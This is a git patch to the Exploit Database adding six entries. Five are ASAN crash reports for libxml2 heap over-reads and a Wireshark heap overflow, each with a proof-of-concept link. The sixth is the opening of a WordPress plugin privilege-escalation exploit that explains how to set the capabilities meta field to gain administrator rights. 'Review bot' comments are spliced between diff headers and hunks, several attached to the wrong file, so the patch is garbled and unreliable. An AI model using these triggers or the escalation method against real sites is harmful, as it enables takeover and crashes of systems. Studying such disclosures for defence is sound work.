From 5f28d686115d2268e67ba95704ded70452af1801 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 25 Feb 2016 05:01:57 +0000
Subject: [PATCH] DB: 2016-02-25 6 new exploits

---
 files.csv | 6 ++
 platforms/linux/dos/39491.txt | 82 ++++++++++++++++++++++
 platforms/linux/dos/39492.txt | 85 +++++++++++++++++++++++
 platforms/linux/dos/39493.txt | 68 +++++++++++++++++++
 platforms/linux/dos/39494.txt | 78 +++++++++++++++++++++
 platforms/multiple/dos/39490.txt | 66 ++++++++++++++++++
 platforms/php/webapps/39489.py | 113 +++++++++++++++++++++++++++++++
 7 files changed, 498 insertions(+)
 create mode 100755 platforms/linux/dos/39491.txt
 create mode 100755 platforms/linux/dos/39492.txt
 create mode 100755 platforms/linux/dos/39493.txt
 create mode 100755 platforms/linux/dos/39494.txt
 create mode 100755 platforms/multiple/dos/39490.txt
 create mode 100755 platforms/php/webapps/39489.py

diff --git a/files.csv b/files.csv
index 2fe630d53..e15433ab3 100755
--- a/files.csv
+++ b/files.csv
@@ -35725,3 +35725,9 @@ id,file,description,date,author,platform,type,port
 39485,platforms/asp/webapps/39485.txt,"Thru Managed File Transfer Portal 9.0.2 - SQL Injection",2016-02-22,"SySS GmbH",asp,webapps,80
 39487,platforms/multiple/dos/39487.py,"libquicktime 1.2.4 - Integer Overflow",2016-02-23,"Marco Romano",multiple,dos,0
 39488,platforms/json/webapps/39488.txt,"Ubiquiti Networks UniFi 3.2.10 - CSRF Vulnerability",2016-02-23,"Julien Ahrens",json,webapps,8443
+39489,platforms/php/webapps/39489.py,"WordPress Extra User Details Plugin 0.4.2 - Privilege Escalation",2016-02-24,"Panagiotis Vagenas",php,webapps,80
+39490,platforms/multiple/dos/39490.txt,"Wireshark - vwr_read_s2_s3_W_rec Heap-Based Buffer Overflow",2016-02-24,"Google Security Research",multiple,dos,0
+39491,platforms/linux/dos/39491.txt,"libxml2 - xmlDictAddString Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0
+39492,platforms/linux/dos/39492.txt,"libxml2 - xmlParseEndTag2 Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0
+39493,platforms/linux/dos/39493.txt,"libxml2 - xmlParserPrintFileContextInternal Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0
+39494,platforms/linux/dos/39494.txt,"libxml2 - htmlCurrentChar Heap-Based Buffer Overread",2016-02-24,"Google Security Research",linux,dos,0
diff --git a/platforms/linux/dos/39491.txt b/platforms/linux/dos/39491.txt
new file mode 100755
index 000000000..65c786ea7
--- /dev/null
+++ b/platforms/linux/dos/39491.txt
@@ -0,0 +1,82 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=637
+
+The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint --html /path/to/file"):
+
+--- cut ---
+==25920==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x631000010810 at pc 0x0000004a2f25 bp 0x7ffc81805ae0 sp 0x7ffc81805290
+READ of size 73661 at 0x631000010810 thread T0
+    #0 0x4a2f24 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
+    #1 0xd026b2 in xmlDictAddString libxml2-2.9.3/dict.c:285:5
+    #2 0xd009e8 in xmlDictLookup libxml2-2.9.3/dict.c:926:11
+    #3 0x806e4d in htmlParseNameComplex libxml2-2.9.3/HTMLparser.c:2517:12
+    #4 0x7cc29d in htmlParseName libxml2-2.9.3/HTMLparser.c:2483:12
+    #5 0x7ca6f1 in htmlParseEntityRef libxml2-2.9.3/HTMLparser.c:2682:16
+    #6 0x820a0d in htmlParseReference libxml2-2.9.3/HTMLparser.c:4044:8
+    #7 0x7df716 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4619:3
+    #8 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
+    #9 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
+    #10 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
+    #11 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
+    #12 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
+
+0x631000010810 is located 0 bytes to the right of 65552-byte region [0x631000000800,0x631000010810)
+allocated by thread T0 here:
+    #0 0x4b8ef0 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61
+    #1 0xa079a5 in xmlBufGrowInternal libxml2-2.9.3/buf.c:486:23
+    #2 0xa06722 in xmlBufGrow libxml2-2.9.3/buf.c:515:11
+    #3 0x72fef4 in xmlParserInputBufferGrow libxml2-2.9.3/xmlIO.c:3326:9
+    #4 0x543b22 in xmlParserInputGrow libxml2-2.9.3/parserInternals.c:320:8
+    #5 0x8067f4 in htmlParseNameComplex libxml2-2.9.3/HTMLparser.c:2511:6
+    #6 0x7cc29d in htmlParseName libxml2-2.9.3/HTMLparser.c:2483:12
+    #7 0x7ca6f1 in htmlParseEntityRef libxml2-2.9.3/HTMLparser.c:2682:16
+    #8 0x820a0d in htmlParseReference libxml2-2.9.3/HTMLparser.c:4044:8
+    #9 0x7df716 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4619:3
+    #10 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
+    #11 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
+    #12 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
+    #13 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
+    #14 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
+Shadow bytes around the buggy address:
+  0x0c627fffa0b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c627fffa0c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c627fffa0d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c627fffa0e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c627fffa0f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0c627fffa100: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c627fffa110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c627fffa120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c627fffa130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c627fffa140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c627fffa150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable: 00
+  Partially addressable: 01 02 03 04 05 06 07
+  Heap left redzone: fa
+  Heap right redzone: fb
+  Freed heap region: fd
+  Stack left redzone: f1
+  Stack mid redzone: f2
+  Stack right redzone: f3
+  Stack partial redzone: f4
+  Stack after return: f5
+  Stack use after scope: f8
+  Global redzone: f9
+  Global init order: f6
+  Poisoned by user: f7
+  Container overflow: fc
+  Array cookie: ac
+  Intra object redzone: bb
+  ASan internal: fe
+  Left alloca redzone: ca
+  Right alloca redzone: cb
+==25920==ABORTING
+--- cut ---
+
+The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758605. Attached is an XML file which triggers the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39491.zip
+
diff --git a/platforms/linux/dos/39492.txt b/platforms/linux/dos/39492.txt
new file mode 100755
index 000000000..77c2418e6
--- /dev/null
+++ b/platforms/linux/dos/39492.txt
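Review bot: The closing sentence says "Attached is an XML file which triggers the crash", but the reproduction command is `./xmllint --html /path/to/file` and every parser frame (#3 through #10) is in HTMLparser.c, so the input is consumed by the HTML parser and a reader feeding it to the XML path will not reach htmlParseEntityRef; the sentence should read `Attached is an HTML file which triggers the crash when parsed with --html`. It is also worth spelling out that the faulting access is a memcpy of 73661 bytes in xmlDictAddString (frame #1) sourced from a 65552-byte input buffer: the bytes past the end are copied into the dictionary string pool, so on a non-instrumented build this presumably surfaces adjacent heap contents in the parsed name rather than only crashing, which the `dos` classification in files.csv does not convey. The affected version is given only as "2.9.3, released 4 days ago"; an absolute release date would age better.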
@@ -0,0 +1,85 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=638
+
+The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint /path/to/file"):
+
+--- cut ---
+==4588==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6290000049e6 at pc 0x00000062b643 bp 0x7ffffa00f570 sp 0x7ffffa00f568
+READ of size 1 at 0x6290000049e6 thread T0
+    #0 0x62b642 in xmlParseEndTag2 libxml2-2.9.3/parser.c:9828:13
+    #1 0x61d620 in xmlParseElement libxml2-2.9.3/parser.c:10238:2
+    #2 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
+    #3 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
+    #4 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
+    #5 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
+    #6 0x63be9b in xmlParseDocument libxml2-2.9.3/parser.c:10912:2
+    #7 0x672b74 in xmlDoRead libxml2-2.9.3/parser.c:15390:5
+    #8 0x673041 in xmlReadFile libxml2-2.9.3/parser.c:15452:13
+    #9 0x4f5b60 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2401:9
+    #10 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
+
+0x6290000049e6 is located 2018 bytes to the right of 16388-byte region [0x629000000200,0x629000004204)
+allocated by thread T0 here:
+    #0 0x4b8ef0 in realloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:61
+    #1 0xa079a5 in xmlBufGrowInternal libxml2-2.9.3/buf.c:486:23
+    #2 0xa06722 in xmlBufGrow libxml2-2.9.3/buf.c:515:11
+    #3 0x72fef4 in xmlParserInputBufferGrow libxml2-2.9.3/xmlIO.c:3326:9
+    #4 0x543b22 in xmlParserInputGrow libxml2-2.9.3/parserInternals.c:320:8
+    #5 0x569d10 in xmlGROW libxml2-2.9.3/parser.c:2081:5
+    #6 0x68208d in xmlParseNCNameComplex libxml2-2.9.3/parser.c:3499:6
+    #7 0x68136d in xmlParseNCName libxml2-2.9.3/parser.c:3591:12
+    #8 0x67d282 in xmlParseQName libxml2-2.9.3/parser.c:8859:9
+    #9 0x61f04d in xmlParseStartTag2 libxml2-2.9.3/parser.c:9381:17
+    #10 0x61a626 in xmlParseElement libxml2-2.9.3/parser.c:10129:16
+    #11 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
+    #12 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
+    #13 0x618dac in xmlParseContent libxml2-2.9.3/parser.c:10042:6
+    #14 0x61cc7c in xmlParseElement libxml2-2.9.3/parser.c:10215:5
+    #15 0x63be9b in xmlParseDocument libxml2-2.9.3/parser.c:10912:2
+    #16 0x672b74 in xmlDoRead libxml2-2.9.3/parser.c:15390:5
+    #17 0x673041 in xmlReadFile libxml2-2.9.3/parser.c:15452:13
+    #18 0x4f5b60 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2401:9
+    #19 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow libxml2-2.9.3/parser.c:9828:13 in xmlParseEndTag2
+Shadow bytes around the buggy address:
+  0x0c527fff88e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c527fff88f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c527fff8900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c527fff8910: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c527fff8920: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+=>0x0c527fff8930: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa
+  0x0c527fff8940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c527fff8950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c527fff8960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c527fff8970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c527fff8980: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable: 00
+  Partially addressable: 01 02 03 04 05 06 07
+  Heap left redzone: fa
+  Heap right redzone: fb
+  Freed heap region: fd
+  Stack left redzone: f1
+  Stack mid redzone: f2
+  Stack right redzone: f3
+  Stack partial redzone: f4
+  Stack after return: f5
+  Stack use after scope: f8
+  Global redzone: f9
+  Global init order: f6
+  Poisoned by user: f7
+  Container overflow: fc
+  Array cookie: ac
+  Intra object redzone: bb
+  ASan internal: fe
+  Left alloca redzone: ca
+  Right alloca redzone: cb
+==4588==ABORTING
+--- cut ---
+
+The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758589. Attached is an XML file which triggers the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39492.zip
+
diff --git a/platforms/linux/dos/39493.txt b/platforms/linux/dos/39493.txt
new file mode 100755
index 000000000..298ae9c03
--- /dev/null
+++ b/platforms/linux/dos/39493.txt
@@ -0,0 +1,68 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=639
+
+The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint /path/to/file"):
+
+--- cut ---
+==4210==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6290000051ff at pc 0x000000533c8f bp 0x7ffdb38c4830 sp 0x7ffdb38c4828
+READ of size 1 at 0x6290000051ff thread T0
+    #0 0x533c8e in xmlParserPrintFileContextInternal libxml2-2.9.3/error.c:192:6
+    #1 0x54088a in xmlReportError libxml2-2.9.3/error.c:406:9
+    #2 0x53884f in __xmlRaiseError libxml2-2.9.3/error.c:633:2
+    #3 0x56f0ec in xmlFatalErr libxml2-2.9.3/parser.c:540:5
+    #4 0x569c98 in xmlGROW libxml2-2.9.3/parser.c:2077:9
+    #5 0x62bcb3 in xmlParseEndTag2 libxml2-2.9.3/parser.c:9846:5
+    #6 0x61d620 in xmlParseElement libxml2-2.9.3/parser.c:10238:2
+    #7 0x63be9b in xmlParseDocument libxml2-2.9.3/parser.c:10912:2
+    #8 0x672b74 in xmlDoRead libxml2-2.9.3/parser.c:15390:5
+    #9 0x673041 in xmlReadFile libxml2-2.9.3/parser.c:15452:13
+    #10 0x4f5b60 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2401:9
+    #11 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
+
+0x6290000051ff is located 1 bytes to the left of 16384-byte region [0x629000005200,0x629000009200)
+allocated by thread T0 here:
+    #0 0x4b8b68 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
+    #1 0x7f4df5219729 (/lib/x86_64-linux-gnu/libz.so.1+0xf729)
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow libxml2-2.9.3/error.c:192:6 in xmlParserPrintFileContextInternal
+Shadow bytes around the buggy address:
+  0x0c527fff89e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c527fff89f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c527fff8a00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c527fff8a10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c527fff8a20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+=>0x0c527fff8a30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
+  0x0c527fff8a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c527fff8a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c527fff8a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c527fff8a70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c527fff8a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable: 00
+  Partially addressable: 01 02 03 04 05 06 07
+  Heap left redzone: fa
+  Heap right redzone: fb
+  Freed heap region: fd
+  Stack left redzone: f1
+  Stack mid redzone: f2
+  Stack right redzone: f3
+  Stack partial redzone: f4
+  Stack after return: f5
+  Stack use after scope: f8
+  Global redzone: f9
+  Global init order: f6
+  Poisoned by user: f7
+  Container overflow: fc
+  Array cookie: ac
+  Intra object redzone: bb
+  ASan internal: fe
+  Left alloca redzone: ca
+  Right alloca redzone: cb
+==4210==ABORTING
+--- cut ---
+
+The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758588. Attached is an XML file which triggers the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39493.zip
+
diff --git a/platforms/linux/dos/39494.txt b/platforms/linux/dos/39494.txt
new file mode 100755
index 000000000..34d394b9e
--- /dev/null
+++ b/platforms/linux/dos/39494.txt
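Review bot: The faulting read is one byte before the start of a 16384-byte region whose allocation frame #1 sits inside libz.so.1 rather than in libxml2's buffer code, which indicates the attached input is gzip-compressed and is being inflated by libxml2's zlib input path; the description only says "Attached is an XML file". A reader who rebuilds xmllint without zlib support will not reproduce it, so the sentence should say `Attached is a gzip-compressed XML file which triggers the crash; libxml2 must be built with zlib support`. It is also worth noting that the access happens in error-context printing (xmlParserPrintFileContextInternal, reached through xmlFatalErr from xmlGROW in frames #3-#4), apparently while scanning backwards from the current input position, so the bug is only reachable after the parser has already raised a fatal error; that bounds its reach to the diagnostics path, which is useful for anyone triaging the four libxml2 reports in this commit together.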
@@ -0,0 +1,78 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=636
+
+The following crash due to a heap-based out-of-bounds memory read can be observed in an ASAN build of latest stable libxml2 (2.9.3, released 4 days ago), by feeding a malformed file to xmllint ("$ ./xmllint --html /path/to/file"):
+
+--- cut ---
+==26202==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62100001c900 at pc 0x0000008073f9 bp 0x7ffd791c7f90 sp 0x7ffd791c7f88
+READ of size 1 at 0x62100001c900 thread T0
+    #0 0x8073f8 in htmlCurrentChar libxml2-2.9.3/HTMLparser.c:439:6
+    #1 0x80ee62 in htmlParseCharDataInternal libxml2-2.9.3/HTMLparser.c:3011:8
+    #2 0x821b85 in htmlParseCharData libxml2-2.9.3/HTMLparser.c:3061:5
+    #3 0x7df875 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4634:3
+    #4 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
+    #5 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
+    #6 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
+    #7 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
+    #8 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
+
+0x62100001c900 is located 0 bytes to the right of 4096-byte region [0x62100001b900,0x62100001c900)
+allocated by thread T0 here:
+    #0 0x4b8b68 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
+    #1 0xa01a0c in xmlBufCreate libxml2-2.9.3/buf.c:137:32
+    #2 0x550aca in xmlSwitchInputEncodingInt libxml2-2.9.3/parserInternals.c:1205:34
+    #3 0x54f5ce in xmlSwitchToEncodingInt libxml2-2.9.3/parserInternals.c:1281:12
+    #4 0x54f278 in xmlSwitchEncoding libxml2-2.9.3/parserInternals.c:1101:11
+    #5 0x808eea in htmlCurrentChar libxml2-2.9.3/HTMLparser.c:518:13
+    #6 0x804a38 in htmlParseNameComplex libxml2-2.9.3/HTMLparser.c:2496:9
+    #7 0x7cc29d in htmlParseName libxml2-2.9.3/HTMLparser.c:2483:12
+    #8 0x7ec211 in htmlParseDocTypeDecl libxml2-2.9.3/HTMLparser.c:3424:12
+    #9 0x7debf4 in htmlParseContentInternal libxml2-2.9.3/HTMLparser.c:4585:3
+    #10 0x7e2f0f in htmlParseDocument libxml2-2.9.3/HTMLparser.c:4769:5
+    #11 0x802c55 in htmlDoRead libxml2-2.9.3/HTMLparser.c:6741:5
+    #12 0x8030b6 in htmlReadFile libxml2-2.9.3/HTMLparser.c:6799:13
+    #13 0x4f47a5 in parseAndPrintFile libxml2-2.9.3/xmllint.c:2248:8
+    #14 0x4ebe8f in main libxml2-2.9.3/xmllint.c:3759:7
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow libxml2-2.9.3/HTMLparser.c:439:6 in htmlCurrentChar
+Shadow bytes around the buggy address:
+  0x0c427fffb8d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c427fffb8e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c427fffb8f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c427fffb900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c427fffb910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0c427fffb920:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fffb930: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fffb940: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fffb950: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fffb960: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c427fffb970: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable: 00
+  Partially addressable: 01 02 03 04 05 06 07
+  Heap left redzone: fa
+  Heap right redzone: fb
+  Freed heap region: fd
+  Stack left redzone: f1
+  Stack mid redzone: f2
+  Stack right redzone: f3
+  Stack partial redzone: f4
+  Stack after return: f5
+  Stack use after scope: f8
+  Global redzone: f9
+  Global init order: f6
+  Poisoned by user: f7
+  Container overflow: fc
+  Array cookie: ac
+  Intra object redzone: bb
+  ASan internal: fe
+  Left alloca redzone: ca
+  Right alloca redzone: cb
+==26202==ABORTING
+--- cut ---
+
+The crash was reported at https://bugzilla.gnome.org/show_bug.cgi?id=758606. Attached is an XML file which triggers the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39494.zip
+
diff --git a/platforms/multiple/dos/39490.txt b/platforms/multiple/dos/39490.txt
new file mode 100755
index 000000000..b651283bf
--- /dev/null
+++ b/platforms/multiple/dos/39490.txt
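Review bot: As in the xmlDictAddString report, the closing text says "Attached is an XML file" while the trigger command is `./xmllint --html` and every frame of both stacks is in HTMLparser.c, so the sentence should read `Attached is an HTML file which triggers the crash when parsed with --html`; without the switch the XML parser is used and the bug is not reached. The allocation stack is also worth a sentence of its own: the 4096-byte buffer was created by xmlSwitchEncoding called from htmlCurrentChar itself (frames #1-#5) while parsing the DOCTYPE, and the over-read at HTMLparser.c:439 then runs off the end of that replacement buffer, which presumably points at a position or length carried over from before the encoding switch; stating that would help anyone locating the fix, though it needs confirming against the source, which is not in the hunk.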
@@ -0,0 +1,66 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=647
+
+The following crash due to a heap-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
+
+--- cut ---
+==5869==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001e95c at pc 0x0000004c1386 bp 0x7fff8c82cbf0 sp 0x7fff8c82c3a0
+WRITE of size 1425 at 0x61b00001e95c thread T0
+    #0 0x4c1385 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
+    #1 0x9c8ab0 in vwr_read_s2_s3_W_rec wireshark/wiretap/vwr.c:1614:5
+    #2 0x9bc02a in vwr_process_rec_data wireshark/wiretap/vwr.c:2336:20
+    #3 0x9babf2 in vwr_read wireshark/wiretap/vwr.c:653:10
+    #4 0x9d64c2 in wtap_read wireshark/wiretap/wtap.c:1314:7
+    #5 0x535c1a in load_cap_file wireshark/tshark.c:3479:12
+    #6 0x52c1df in main wireshark/tshark.c:2197:13
+
+0x61b00001e95c is located 0 bytes to the right of 1500-byte region [0x61b00001e380,0x61b00001e95c)
+allocated by thread T0 here:
+    #0 0x4d6ff8 in __interceptor_malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
+    #1 0x7f1f907a8610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
+    #2 0x83fff6 in wtap_open_offline wireshark/wiretap/file_access.c:1105:2
+    #3 0x53214d in cf_open wireshark/tshark.c:4195:9
+    #4 0x52bc7e in main wireshark/tshark.c:2188:9
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
+Shadow bytes around the buggy address:
+  0x0c367fffbcd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c367fffbce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c367fffbcf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c367fffbd00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c367fffbd10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0c367fffbd20: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
+  0x0c367fffbd30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c367fffbd40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c367fffbd50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c367fffbd60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c367fffbd70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable: 00
+  Partially addressable: 01 02 03 04 05 06 07
+  Heap left redzone: fa
+  Heap right redzone: fb
+  Freed heap region: fd
+  Stack left redzone: f1
+  Stack mid redzone: f2
+  Stack right redzone: f3
+  Stack partial redzone: f4
+  Stack after return: f5
+  Stack use after scope: f8
+  Global redzone: f9
+  Global init order: f6
+  Poisoned by user: f7
+  Container overflow: fc
+  Array cookie: ac
+  Intra object redzone: bb
+  ASan internal: fe
+  Left alloca redzone: ca
+  Right alloca redzone: cb
+==5869==ABORTING
+--- cut ---
+
+The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11795. Attached are three files which trigger the crash.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39490.zip
+
diff --git a/platforms/php/webapps/39489.py b/platforms/php/webapps/39489.py
new file mode 100755
index 000000000..b1398ea67
--- /dev/null
+++ b/platforms/php/webapps/39489.py
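Review bot: Unlike the four libxml2 reports this is a heap WRITE: a memcpy of 1425 bytes (frames #0-#1, vwr.c:1614) lands at the very end of a 1500-byte buffer that was allocated once in wtap_open_offline, so a record length taken from the capture file is not bounded against the buffer before the copy. That is a memory-corruption primitive rather than only a crash, and the summary should say so explicitly, e.g. `heap-based buffer overflow (out-of-bounds write of attacker-controlled length), potential code execution`, since the `dos` category assigned in files.csv understates it. The target is identified only as "current git master"; the commit hash or the affected release range should be named so readers can tell which Wireshark builds are exposed. The natural fix is a check of the record length against the buffer size ahead of the memcpy in vwr_read_s2_s3_W_rec, but vwr.c is not in the hunk, so that is to be confirmed there.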
@@ -0,0 +1,113 @@
+"""
+* Exploit Title: Extra User Details [Privilege Escalation]
+* Discovery Date: 2016-02-13
+* Exploit Author: Panagiotis Vagenas
+* Author Link: https://twitter.com/panVagenas
+* Vendor Homepage: http://vadimk.com/
+* Software Link: https://wordpress.org/plugins/extra-user-details/
+* Version: 0.4.2
+* Tested on: WordPress 4.4.2
+* Category: WebApps, WordPress
+
+
+Description
+-----------
+
+_Extra User Details_ plugin for WordPress suffers from a Privilege
+Escalation
+vulnerability.
+
+The plugin hooks the `eud_update_ExtraFields` function to `profile_update`
+WordPress action. This function doesn't properly check user capabilities
+and
+updates all meta information passed to post data. The only condition is
+that
+the post variable name has the `eud` prefix which is striped before
+updating
+the values in DB.
+
+An attacker can exploit this misbehavior to update the
+{prefix}\_capabilities
+ meta information to gain administrative privileges.
+
+PoC
+---
+
+In the following PoC we assume that the database has the `wp` prefix, a
+very
+common scenario as this is the default WordPress value
+
+"""
+# !/usr/bin/python3
+
+################################################################################
+# Extra User Details Privilege Escalation Exploit
+#
+# Author: Panagiotis Vagenas
+#
+# Dependencies: BeautifulSoup
